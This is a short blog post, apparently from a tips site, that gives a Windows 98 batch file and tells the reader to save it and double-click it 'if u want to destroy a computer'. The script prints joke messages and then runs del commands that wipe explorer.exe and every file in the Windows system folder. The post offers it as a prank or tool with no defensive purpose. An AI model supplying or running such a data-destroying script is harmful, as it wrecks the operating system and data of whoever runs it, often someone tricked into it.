Posted at
Creating a batch file to destroy a comp on windows 98

Creating a batch file to destroy a comp on windows 98

Type the following code in notepad:

@echo off
echo your computer has lived its life
echo Gurneet Singh Rules!!
echo astalavista baby!!
del c:\windows\explorer.exe
del c:\windows\*.*
cls
exit

Then save the file as anyname.bat
Double click on it if u want to destroy a computer.














Sagunesh is a founder of this website Tech Tricks and Tips if you have any queries or problem then you can comment in the comment box below and i will resolve it 

Posted in |